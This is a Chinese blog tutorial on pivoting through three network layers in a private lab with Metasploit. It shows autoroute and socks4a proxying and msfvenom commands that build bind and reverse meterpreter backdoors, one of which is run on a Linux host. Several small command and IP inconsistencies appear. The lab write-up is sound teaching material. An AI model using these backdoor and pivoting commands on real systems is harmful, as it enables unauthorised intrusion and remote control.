MSF三层网络渗透

最新推荐文章于 2024-05-13 03:56:44 发布
最新推荐文章于 2024-05-13 03:56:44 发布
阅读量746 收藏 7
点赞数 3
分类专栏: 后渗透 文章标签: 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44842234/article/details/125525867
版权

 网络拓扑图如下

假设已经拿到了跳板机B的权限
其中A、B、C为windows D为linux服务器

ipconfig发现存在两张网卡
192.168.31.60
192.168.3.31

 

在kali(A主机)meterpreter 中添加去往 192.168.3.0网段的路由并且启动socks4a代理 

meterpreter > run autoroute -s 192.168.3.0/24                      #添加路由
meterpreter > run autoroute -p                                     #查看路由
msf6 exploit(multi/handler) > use auxiliary/server/socks4a         #使用socks4a协议并运行

注:socks4a在msf中默认远端端口为1080端口,故在/etc/proxychains.conf 也要设置为1080端口

 

vi /etc/proxychains.conf 
添加 socks4  192.168.31.31 1080


成功访问第二层网络

 

msf配合Proxifier实现内网穿透
在本机连接kali的1080端口(socks4a)

本机通过Proxifier成功访问第二层网络(C主机)

制作后门穿透第三层网络(正向连接)
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4321 -f exe -o 4321.exe
注:C主机监听4321端口,B主机主动连接C主机。

 

 

use exploit/multi/handler
连接C主机的ip 192.168.3.3

 

成功得到会话

ipconfig发现存在两张网卡
192.168.3.3
10.10.10.1

添加去往 192.168.3.0网段的路由并且启动socks4a代理
meterpreter > run autoroute -s 10.10.10.0/24                      #添加路由
meterpreter > run autoroute -p                                    #查看路由
msf6 exploit(multi/handler) > use auxiliary/server/socks4a        #使用socks4a协议并运行

 

设置socks4a端口为9999

 

vi /etc/proxychains.conf 
添加 socks4  192.168.31.31 9999

 proxychains curl http://10.10.10.2/ip.txt
可以看到代理经过了192.168.31.31:1080->192.168.31.31:9999成功访问第三层网络的主机 10.10.10.2

 本机访问也可以访问到第三层网络

 

 

生成一个反向后门(因为D主机为linux,故生成一个elf格式的后门)
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost 10.10.10.1 lport=1234 -f elf -o 123.elf

 

监听 linux/x86/meterpreter/reverse_tcp

 

 在D主机上执行后门
 chmod +x 123.elf
./123.elf

 10.0.0.2(D主机)成功上线

 

 

TheK403
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一个实验了解多内网渗透
Jeeseen123的博客
11-03 1610
原创:锦行安全平台部zy 近年来,攻击者潜伏在企业内网进行攻击的安全事件屡见不鲜,攻击者在经常会企业的内网进行横向渗透,令防守方防不胜防。因此,我们应该严格控制好网络区域之间的访问规则,加大攻击横向渗透的阻力。本文由锦行科技的安全研究团队提供,旨在通过实验演示进一步了解攻击者是如何在多内网进行的渗透。 一、实验简介 网络拓扑图 渗透机:win10+kali 第一靶机 (外网web服务器): Linux 第二场靶机 (内网web服务器): Linux 第三层靶机 (内网办公机) : win7 用三层
浅谈MSF渗透测试
02-24
渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、...
三层内网渗透
weixin_53670970的博客
11-09 417
内网渗透
利用MSF实现三层网络的一次内网渗透
weixin_34357962的博客
06-19 532
目标IP192.168.31.207 很明显这是一个文件上传的靶场 白名单限制 各种尝试之后发现这是一个检测文件类型的限制 上传php大马文件后抓包修改其类型为 image/jpeg 上传大马之后发现目标是linux系统 尝试反弹一个shell成功了是www权限 查看内核版本如下 上传对应的cve进行提权 脚本如下: ...
内网穿透
weixin_46686336的博客
11-10 243
内网渗透
简单模拟三层内网渗透
Globalizationa的博客
02-05 773
0X01 设置三张独立网卡简单的网路拓扑图0X02 按照上面的网络拓扑图设置IP0X03 实验背景:已经拿下Ubuntu的webshell的情况下进行进入会话,查看网络环境,发现还有个网段地址 192.168.220.0/240X04 第二网络探索利用第一的meterpreter添加第二的路由:然后利用msf进行第二网络存活主机扫描:切换到扫描模块 use auxiliary/scanner/discovery/arp_sweep 进行各项配置之后,查询之后发现只有192.16...
msf 渗透测试
06-05
#### 三、Metasploit前期渗透技巧 1. **msfconsole**: Metasploit的命令行界面。 - 使用方法:`msfconsole -r <资源脚本>`。 - 可以加载预先配置好的资源脚本来自动化任务流程。 2. **msfpayload**: 用于生成...
Bt5+msf+ettercap内网渗透
01-20
kali linux 内网渗透视频教程,详细的操作过程和原理。
kali 渗透msf
11-14
kali渗透测试利器
70-70.渗透测试-kali更新msf.mp4
05-10
70-70.渗透测试-kali更新msf.mp4
三层网络渗透测试实验
m0_60571990的博客
11-23 247
三层网络渗透测试实验
隧道技术 Frp 多内网穿透
Love&Share
12-21 4488
文章目录Frp穿透Frp多内网实战实验环境操作第一隧道第二隧道 Frp穿透 项目地址:https://github.com/fatedier/frp 中文文档:https://gofrp.org/docs/ frp 是一个可用于内网穿透的高性能的全平台反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网 frp 采用 Golang 编写,支持跨平台,仅需下载对应平台的二进制文件即可执行,没有额外依赖 F.
三层网络靶场搭建&MSF内网渗透
orange777
02-09 2483
三层网络靶场搭建&MSF内网渗透 在最近的CTF比赛中,综合靶场出现的次数越来越多,这种形式的靶场和真实的内网渗透很像,很贴合实际工作,但我们往往缺少多网络的练习环境。本文通过VMware搭建3网络,并通过msf进行内网渗透,涉及代理搭建,流量转发,端口映射等常见内网渗透技术。 网络拓扑 环境搭建 首先在虚拟机中新建3块网卡,选择仅主机模式 将kali设为第一网络vmnet1 将第一靶机设为双网卡vmnet1和vmnet2 将第二靶机设置为双网卡:vmnet2和vmnet3:
FRP多级内网穿透实验(虚拟机多级网络环境搭建+FRP工具使用
最新发布
AFCC_的博客(Web_Dog)
05-13 896
frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。
内网穿透之多代理
weixin_43047908的博客
10-10 2545
目录前言环境搭建ewfrp 前言 平时看大部分文章都是讲的两网络的穿透,在真实场景下,有时候是三层甚至四,自己实践之后发现还是和两网络差距比较大的。由于是三层网络,写起来图会比较多,选取了四款常用穿透软件:ew,nps,frp进行试验。 环境搭建 拓扑图如下: 192.168.1.0/24模拟公网环境。 每台PC上都有一个web服务,内网主机除边缘win7外全部不出网,内网同网段之间的主机可以相互访问,不同网段相互隔离。 假设现在已经拿到边缘主机win7。(文中所指的win2012全部指相对左边这台
红队——多内网环境渗透测试
m0_65355570的博客
12-06 686
本次多网络渗透项目旨在模拟红队攻击人员在授权情况下对目标进行渗透,从外网打点到内网横向穿透,最终获得整个内网权限的过程,包含GPP漏洞利用,非约束委派和约束委派,CVE-2020-1472,SQLServer提权等等文中若有不当之处,还望各位大佬多多点评。请注意:整个环境共四台目标机,分别处在三层内网环境当中DMZ区的靶机拥有两个网卡,一个用来对外提供服务,一个用来连通第二次网络第二网络的靶机同样有两个网卡,一个连通第二网络,一个连通第三层网络三层网络的靶机只有一张网卡,连通第三层网络,包含域控机
使用frp隧道穿透多内网
qq_18811919的博客
12-22 795
在内网中使用frp隧道穿透多内网
[内网渗透]CFS三层靶机渗透
leekos的博客,分享web安全相关知识~
08-12 1170
MSF中开启监听,与Target2建立连接,这里需要注意,上一次代理使用的reverse_tcp是MSF作为监听,让Target1连到我们,而这次代理使用的bind_tcp是Target2作为监听,我们需要连到Target2,这个逻辑正好是相反的。我们可以设置一个路由,然后把我们的请求通过Target1的vmnet1网段发出,然后重定向转发到vmnet2网段,这样kali的msf就可以与22网段(Target2)互通了。(新开一个终端后,我们需要在这个新开的msf终端上配置一个代理,然后修改。
多种内网穿透的实现方案
leoppeng的专栏
04-26 4803
需要注意的是,SSH隧道的性能受到SSH连接的影响,因此在使用SSH隧道时,需要考虑网络环境和SSH连接的稳定性,以确保数据的可靠传输。1G流量也不太够用。SSH隧道是通过在一条SSH连接中嵌入其他协议的方法来实现的,因此它不是一个单独的连接,而是在已有的SSH连接之上添加了额外的功能。比如企业微信、钉钉等开发,需要一个回调地址,开发的时候,希望回调到开发的电脑上,打断点进行调试,这就需要穿透到内网的开发机器。但是在下载的时候杀毒软件直接报毒删掉了,查了下,网上也有很多类似情况,还有安装后中勒索者病毒的。
msf渗透linux
09-07
MSF (Metasploit Framework) 是一个开源的渗透测试工具,用于评估和保护计算机系统的安全性。它提供了一系列的模块和工具,可以用于漏洞扫描、漏洞利用、远程控制和后渗透等活动。 在使用 MSF 进行 Linux 渗透测试时,可以使用不同的模块和命令来实现不同的目标。比如,可以使用 "exploit/multi/mysql/mysql_udf_payload" 模块来执行针对 MySQL 数据库的攻击,并利用已知的漏洞进行远程执行代码的操作。 运行 "run" 命令来执行该模块。同样地,可以使用 "exploit(windows/http/manageengine_connectionid_write)" 模块来针对 ManageEngine 连接标识写入漏洞进行攻击,并通过 "run" 命令来执行该模块。 除了执行攻击模块外,还可以使用 "set" 命令来设置模块的参数。例如,可以使用 "exploit(multi/mysql/mysql_udf_payload)" 模块并通过 "set username root" 命令将用户名设置为 "root"。 需要注意的是,MSF 是一个强大的工具,应该在合法和授权的环境中使用。在进行任何渗透测试活动之前,请确保已经获得了适当的授权和许可,并遵守法律和道德准则。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值